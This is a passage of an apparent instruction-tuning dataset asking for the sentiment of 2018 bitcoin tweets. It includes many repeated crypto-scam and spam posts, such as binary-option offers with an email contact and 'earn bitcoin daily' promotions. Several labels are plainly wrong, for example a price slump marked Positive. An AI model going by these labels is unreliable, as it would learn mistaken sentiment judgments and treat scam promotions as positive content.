@slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Capn_Flint For a second i thought its the bitcoin bubble finally bursting. Now Im sad.\nBUT DAMN! Congrats!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@abigail10t8imo3 if you are interested in trading binary option trade and bitcoin mining message me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I LOVE Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "SKYF chain it is bounty program very potential\n#skyfchain\n#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey dude fuck you and your bitcoin investment opportunity. Acting like I ain\u2019t ever heard of coinbase or others", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@arthwollipot I didn't know you were doing Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC (THE CHAMPCOIN) HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Well, I think different, for me Bitcoin Core is #BitcoinCore. #BitcoinCash is #bitcoin and #cash! @Egon_01", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC,ETH,ETC,LTC,BCH,MONA\nPlease please give me a little earlier Christmas present ...\u3000\n#Bitcoin #VirtualCurrency", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8426.81 / 6831.876\u20ac\n1 bitcoin-cash = $969.099 / 785.678\u20ac\n1 ethereum = $513.803 / 416.556\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Remember when bitcoin was a safe haven asset?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"There are 3 eras of currency: commodity based, politically based, and now, math based.\" - Chris Dixon #bitcoin #quote", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoYoda1338 DOW crash = Bitcoin crash IMO", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ALLinPav This is good for bitcoin!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I am experimenting whether I can live only with bit coins donated. Please cooperate.\n\n12BZeZHNnuy9bVNxqNjNcFi3T91bxLVep ##bitcoin #Donation", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 5 satoshi per byte. \nBTC : $8423 / \u20ac6823 / \u00a35966 @ Block 514768. \nMarket Cap: 143.29B USD. #Bitcoin #Fintech", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "B stands for Bear Run\nB stands for Bitcoin \nB also stands for Block!!\ud83d\udeab\u274c don\u2019t be afraid to use this amazing functionality on social media.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@APompliano @iamjosephyoung if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ErikVoorhees if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BithumbOfficial Skycoin is Next Bitcoin\uff01Lol", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoNikita What are you buying these days Nikita? U should consider some bitcoin private .", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@trmakgatho if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bye bye bull.\nBuy position in another few hundred #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin slumps after Japan's FSA warns #Binance for operating without a license. -4.5% so far.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "haha diet bitcoin what in the fuck", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin donation adress is:\n\n1NVNeGryRdNycGEqDv8KqFwUHNpadScU3q\n\nWe do not have to eat \n\n#donation", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just giggle like a kid when I\ufe0f check my bitcoin account \ud83e\udd11\ud83e\udd11\ud83e\udd11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RepRatcliffe What about Devos, Price, Mercer and even Theil who supports Russia with BITCOIN!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@XRPTrump @TwitterSupport Sadly Tweetters CEO is only supporting bitcoin. The xrp community no longer have a voice in this", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitcoingold we trust bitcoin gold more than bch ,\nin future price be higher its civil coin !\nbut bch is monopoly bitmain monster.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "MEH WANT BITCOIN!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ChrisMaroleng if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin eliminates the need for banks, gets rid of credit card fees, currency exchange fees and money transfer fees #bitcoin #bitcoinminer", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lols,this generation won't kill me! Which one is \"o sha prapra olosho to n gba bitcoin\"? \ud83d\ude01\ud83d\ude01\ud83d\ude01", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Simply_Msizi if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin's movies discussion makes it a front-runner to these corporations", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@reaposhi wht was interesting to me is that ceo of bitcoin dot com was actively saying that they were supporting bitcoin cash.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "More and more #hosting companies start accepting #bitcoin and other #cryptocurrencies. Just an observation.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cointelegraph Bitcoin bubble crashing really hard", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8435.77 / 6839.14\u20ac\n1 bitcoin-cash = $972.047 / 788.068\u20ac\n1 ethereum = $515.26 / 417.737\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mbali_ndlela if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Wake the F*CK up people! If you don't own #crypto by mid-2018 then you are going to miss out 'THE CHANCE' of your life. #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Calm before the storm...\n\n#bitcoin #crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8419.63", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto Bitcoin might be illegal as they found child porn links embed in the blockchain. Maybe reason why we have panic sellout", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yishi888 Wish I could buy more OCN but my money is stuck in SAY \ud83d\ude29\ud83d\ude29\ud83d\ude29 praying Kucoin gives us bitcoin for the SAY so I can buy more OCN!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge But in saying that I think Bitcoin Cash touches most ppl in a bad place...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sabotagebeats Yeah. But bitcoin dot com has nothing to do with bitcoin. It\u2019s a propaganda site for bcash runned by the btrash scam team.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "what the online social media website named Twitter\u2122 about bitcoin can i just buy some ethereum on coinbase", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "PEOPLE LOOK INTO A CRYPTOCURRENCY CALLED WANCHAIN ( WAN) ALL IM SAYING IT WILL BE BIGGER THAN BITCOIN !! check it out do your own dd", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@caldwellsiegel1 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@whatbitcoindid Don't transfer more Bitcoin than you are willing to lose to your bitmex account.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Joseph66352787 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@thelastdon430 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@oggasbagss If you can find a bitcoin ATM you can get the wired transfer", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bwreckless if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@A1hurns if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Instant liquidity through the API from the relevant #Minerva trading exchanges. #ICO #Ethereum #Blockchain #Bitcoin #Crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Backed by neither a government nor a bank, bitcoin has attracted currency speculators in recent months.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@footballman58 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This Easter i will be helping my Maglera people get involved in bitcoin mining #oneONone\n\ud83d\ude0e \ud83d\ude0e \ud83d\ude0e", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27838.31 | LITECOIN(MCDTBC) R$573.33000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Join_Civil Fed up with all this Blockchain/Bitcoin hucksterism. Used to watch Max Keizer but bitcoin drove me away. Don\u2019t trust any of it.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,431.17, market cap of $142,778,491,482 (44.43%), and 24 hr vol. of $5,557,890,000 (37.79%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This just in: Bitcoin is rising!\nCurrent Rate: 8395.54 USD = 1 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 23, 2018 01:00AM #Bitcoin Price:\nUSD 8620.63 | EUR 7001.33 | JPY 911884.88", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,443.60\nChange in 1h: +0.18%\nMarket cap: $142,988,988,560.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.49% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,395.54, EUR 6,813.57", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.6 / 6845.488\u20ac\n1 bitcoin-cash = $970.001 / 786.409\u20ac\n1 ethereum = $514.614 / 417.213\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8443.6\nEthereum:$515.299\nBitcoin Cash:$971.412\nLitecoin:$158.261\nRipple:$0.630542\nIOTA:$1.25788", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.6 / 6845.488\u20ac\n1 bitcoin-cash = $970.001 / 786.409\u20ac\n1 ethereum = $514.614 / 417.213\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$23.0M; Support til $8100:$52.1M $BTC $BTCUSD #bitcoin #orderbook #finance #crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8399.68/$8409.04 #Bitstamp\n$8395.20/$8398.92 #Kraken\n\u21e2$-13.84/$-0.76\n$8353.02/$8442.01 #Coinbase\n\u21e2$-56.02/$42.33", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ETH / $BTC marketcap ratio = 35.5% #bitcoin #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2018-03-23 08:00 UTC Bitcoin Price: 8395.52 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SimonBotes @brett_stclair Doubt it\u2019ll happen - why reinvent the wheel when we already have Bitcoin, Monero, etc?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003276 (-0.00000010) #BTC / 0.275143 (-0.00148) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004518 (+0.00000028) #BTC / 0.379461 (+0.00149) #USD. Market rank is 117. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00076389 (-0.00001458) #BTC / 6.41541 (-0.10976) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002235 (-0.00000028) #BTC / 0.187662 (-0.00203) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8403.88 | +0.0011%\ud83d\udcc8\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474086 (-0.00009870) #BTC / 398.154 (-0.05400) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8395.00 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,403.49 v #BitcoinCash $969.54 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 17:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "They said the internet would make the world a better place. They was right. $crypto $BTC #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Selling Bitcoin for BCash is actually very brave. (for different reasons)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is 8395.00 USD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So.... Bitcoin Crash is Twerking Complete!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Market Update:\nBitcoin - $8,443.60 \nBitcoin Cash - $971.41 \nEthereum - $515.30 \nLitecoin - $158.26 \nRipple - $0.63\n#Cryptos", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8395.00 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8395.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "As of March 23, 2018 at 09:00AM, Bitcoin is valued at $8395.00. #cryptocurrencies #cryptofinance24 $BTC #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8395.00 $BTC How's your wallet?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LeNuitRenard @Crypto_Wax @LordRapt0rJesus @ProfFaustus Out of interest, what do you use bitcoin cash to buy?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.45 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8395.00 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN is stuck at 8,400 USD and cannot move from there. Get ready for another PRICE DROP. We would expect to see it around 5,000 USD soon.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver Bitcoin cash? Bahahaha... it\u2019s bcash fool.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin please", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cylinders_io Wonderful project!\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver Just in case you missed it roger. Everyone hates bcash. You lost. Bitcoin won!\u26a1\ufe0f\ud83c\udfc6", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTCUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8443.60 Up +$28.21 +0.33% in the last hour #bitcoin #bitsmart", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Does anyone know how to buy bitcoin that could help me", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Get your ROCKET Coin Now!The Coin of ICO Advisers\n#theicorocket #ICO #bitcoin #blockchain\n#theicorocket #rocket #ico #presale #investment", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8443.71 / 6845.577\u20ac\n1 bitcoin-cash = $972.342 / 788.307\u20ac\n1 ethereum = $517.157 / 419.275\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.435,220\n1 Hour: 0.02 % | 24 Hours: -6.39 % | 7 Days: 2.70 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "SIdeways movements. I have no large position. I just hope Bitcoin does not crash.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee @theemrsmcafee How do you walk with those balls of steel? #Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@2B7C89526 So if we all stop eating and using bitcoin, we will end heart disease and obesity as well as money laundering and crime.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@siosism @rogerkver bitcoin private is real bitcoin cash", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8456.11", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@klr_reno if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoJuan36 @jonny5crypto To get more bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is joss", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@castillo19460 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin price resistance points \n$9280 -> $11300 -> $12900 -> $14500 -> $16900 -> $19800", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Retweet if you agree. Bitcoin is cyber snob currency . #bitcoin #bitcointrading", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9509.67 --- Includes Sum of Forks, Core $8478.00 (89.15%) + Cash $974.68 (10.25%) + Gold $56.99 (0.60%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CatsofVelvet if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8443.71.\nThe current price of BCash is $972.342, or 0.115549 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bryana42535010 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICX is now \u00a32.68. #crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DeplorableLilly if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Do not miss the opportunity to invest in a project, as I do.\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "(\ud83d\udceb) - Does Mario like Bitcoin. \nPages: 1, 2, ... 691, 692", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@66fiveandahalf if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@k_keren @wmd4x buy bitcoin and hodl they say...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$971,616\n1 Hour: 0.06 % | 24 Hours: -7.25 % | 7 Days: 5.27 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge I\u2019m not a super big Bitcoin Cash fan, but seeing all these hateful responses actually makes me want to buy more of it.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alexiou88888888 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8488.51 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Ingrid1Ser if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", 